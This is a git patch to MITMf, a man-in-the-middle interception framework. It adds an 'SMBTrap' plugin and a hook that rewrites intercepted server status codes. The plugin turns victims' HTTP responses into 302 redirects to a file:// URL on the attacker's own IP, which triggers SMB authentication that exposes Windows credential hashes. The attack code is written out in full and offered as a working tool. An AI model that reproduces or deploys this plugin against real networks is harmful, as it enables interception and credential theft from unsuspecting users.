From 840e202e5bd31e918c5eab3d6114be6071112171 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 22 May 2015 20:16:47 +0200 Subject: [PATCH] handleStatus() is now hooked through serverResponseStatus, were now able to modify the server response code and message added the SMBTrap plugin --- core/sergioproxy/ProxyPlugins.py | 2 +- core/servers/http/HTTPServer.py | 3 +++ core/sslstrip/ServerConnection.py | 1 + plugins/SMBTrap.py | 23 +++++++++++++++++++++++ plugins/TestPlugin.py | 2 +- plugins/plugin.py | 7 +++++++ 6 files changed, 36 insertions(+), 2 deletions(-) create mode 100644 plugins/SMBTrap.py diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index d9175a3..35d037d 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -44,7 +44,7 @@ class ProxyPlugins: _instance = None plist = [] - mthdDict = {"connectionMade": "clientRequest", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"} + mthdDict = {"connectionMade": "clientRequest", "handleStatus": "serverResponseStatus", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"} pmthds = {} @staticmethod diff --git a/core/servers/http/HTTPServer.py b/core/servers/http/HTTPServer.py index ce3ba9a..9cb9043 100644 --- a/core/servers/http/HTTPServer.py +++ b/core/servers/http/HTTPServer.py @@ -14,6 +14,9 @@ class HTTPServer: return HTTPServer._instance + def addHandler(self, urlregex, handler, vhost=''): + self.application.add_handlers(vhost, [(urlregex, handler)]) + def start(self, port=80): self.application.listen(port) t = threading.Thread(name='HTTPserver', target=tornado.ioloop.IOLoop.instance().start) diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 74868f4..65503d1 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -120,6 +120,7 @@ class ServerConnection(HTTPClient): self.sendPostData() def handleStatus(self, version, code, message): + version, code, message = self.plugins.hook() mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message)) self.client.setResponseCode(int(code), message) diff --git a/plugins/SMBTrap.py b/plugins/SMBTrap.py new file mode 100644 index 0000000..7110140 --- /dev/null +++ b/plugins/SMBTrap.py @@ -0,0 +1,23 @@ +import logging +import random +import string +from plugins.plugin import Plugin +from core.utils import SystemConfig + +mitmf_logger = logging.getLogger("mitmf") + +class SMBTrap(Plugin): + name = "SMBTrap" + optname = "smbtrap" + desc = "Exploits the SMBTrap vulnerability on connected clients" + version = "1.0" + has_opts = False + + def initialize(self, options): + self.ourip = SystemConfig.getIP(options.interface) + + def serverResponseStatus(self, request, version, code, message): + return (version, 302, "Found") + + def serverHeaders(self, response, request): + response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8))) \ No newline at end of file diff --git a/plugins/TestPlugin.py b/plugins/TestPlugin.py index cd470d5..4fd212c 100644 --- a/plugins/TestPlugin.py +++ b/plugins/TestPlugin.py @@ -10,7 +10,7 @@ class TestPlugin(Plugin): has_opts = False def initialize(self, options): - HTTPServer.getInstance().application.add_handlers('', [(r"/test", MainHandler)]) + HTTPServer.getInstance().addHandler(r"/test/(.*)", MainHandler) class MainHandler(tornado.web.RequestHandler): def get(self): diff --git a/plugins/plugin.py b/plugins/plugin.py index 0d5a324..1d9b82b 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -12,6 +12,7 @@ class Plugin(ConfigWatcher, object): optname = "generic" tree_info = list() desc = "" + version = "0.0" has_opts = False def initialize(self, options): @@ -41,6 +42,12 @@ class Plugin(ConfigWatcher, object): ''' pass + def serverResponseStatus(self, request, version, code, message): + ''' + Handles server response HTTP version, code and message + ''' + return (version, code, message) + def serverResponse(self, response, request, data): ''' Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)